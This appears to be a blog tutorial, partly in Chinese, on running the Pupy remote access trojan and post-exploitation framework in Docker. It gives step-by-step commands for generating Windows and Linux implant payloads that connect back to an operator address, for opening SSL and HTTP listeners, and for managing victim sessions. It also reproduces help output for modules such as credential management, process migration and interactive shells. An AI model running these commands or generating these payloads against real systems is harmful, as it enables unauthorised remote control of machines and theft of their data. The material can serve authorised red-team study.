Use Pupy RAT On Docker

Pupy Remote Administrator Tools

Pupy is an opensource, cross-platform (Windows, Linux, OSX, Android) remote administration and post-exploitation tool mainly written in python


Pull

1
docker pull alxchk/pupy:unstable

Deploy

生成 SSH Key

1
ssh-keygen -f pupy

创建 pupy 项目目录(存放 Payload 输出、Key等)

1
mkdir -p /tmp/pupy

docker run

1
docker run -d -p 2022:22 -v /tmp/pupy:/projects alxchk/pupy:unstable

复制生成的 SSH 公钥到 /tmp/pupy/keys/authorized_keys

1
cp pupy.pub /tmp/pupy/keys/authorized_keys

登录到 Pupy

1
ssh pupy@127.0.0.1 -p 2022 -i pupy

Basic Usage

查看配置 (IP、Port等)

1
docker inspect container_name

登录进入的基本窗口是 Tmux,默认前缀键:C-b

img


生成 Payload

1
gen -f client -O linux -A x64 connect -c 172.17.0.2:8080

Sessions 列表

1
sessions

sessions

监听器: Listen

1
2
3
4
listen -a ssl 443
listen -a http 4444

listen -L

Listen
Listen


Payload

1
gen -f <format> <launcher> -t <transport>

Command

1
2
3
4
5
6
7
8
[-f {client,py,pyinst,py_oneliner,ps1,ps1_oneliner,rubber_ducky,csharp,.NET,.NET_oneliner}]
[-O {android,windows,linux,solaris}] [-A {x86,x64,armhf}]
[-U] [-P PACKER] [-S] [-o OUTPUT]
[-d <ATTEMPTS> <MIN SEC> <MAX SEC>] [-D OUTPUT_DIR]
[-s SCRIPTLET] [-l] [-E] [--no-use-proxy]
[--oneliner-nothidden] [--debug-scriptlets] [--debug]
[--workdir WORKDIR]
[{bind,auto_proxy,dnscnc,connect}] ...

format

1
client, py, pyinst, py_oneliner, ps1, ps1_oneliner, rubber_ducky, csharp, .NET, .NET_oneliner

client : executable to run on the target (.exe, .dll, .lin, .so).


连接方式 (绑定、反射、DNS等)

1
bind, auto_proxy ,dnscnc, connect

生成

1
2
3
gen client -O windows -A x64 connect -c 10.1.1.12:443 -t http

gen ps1 -O windows -A x86 bind --host 10.1.1.12 --port 8080

gen


Base Command

Command

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
{ COMMANDS }
COMMAND   DESCRIPTION
-----------------------------------------------------------------------
dnscnc    DNSCNC control
jobs      Manage Jobs
help      Show help
exposed   list exposed objects/methods
python    Start the local python interpreter (for debugging purposes)
sessions  list/interact with established sessions
restart   Restart pupysh
tag       Assign tag to current session
exit      Exit Shell
connect   Connect to the bind payload
run       Run a module on one or multiple clients
logging   Show/set log level
config    Work with configuration file
gen       Generate payload
creds     Credentials manager
listen    start/stop/show current listeners

ALIASED MODULES

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
{ ALIASED MODULES }
MODULE   DESCRIPTION
------------------------------------------------------------
getpid   list process information
exit     exit the client on the other side
getppid  list parent process information
cd       change directory
alive    request to send keepalive packets on rpyc level
rm       remove a file or a directory
netstat  list terminal sessions
last     list terminal sessions
w        list terminal sessions
date     Get current date
cp       copy file or directory
ps       list processes
mkdir    create an empty directory
forward  Local/remote port forwarding and SOCKS proxy
ls       list system files
cat      show contents of a file
mv       move file or directory
ip       list interfaces
http     Trivial Get/Post requests via HTTP protocol
getuid   get username
pwd      Get current working dir

Aliases

1
2
3
4
5
6
7
8
9
10
11
12
{ ALIASES }
ALIAS    COMMAND
----------------------------
info     get_info
pyexec   pyexec
exec     shell_exec
ps       ps
migrate  migrate
shell    interactive_shell
kill     process_kill
mount    drives
du       download -S
工具使用
Tools

本博客所有文章除特别声明外,均采用 CC BY-SA 4.0 协议 ,转载请注明出处!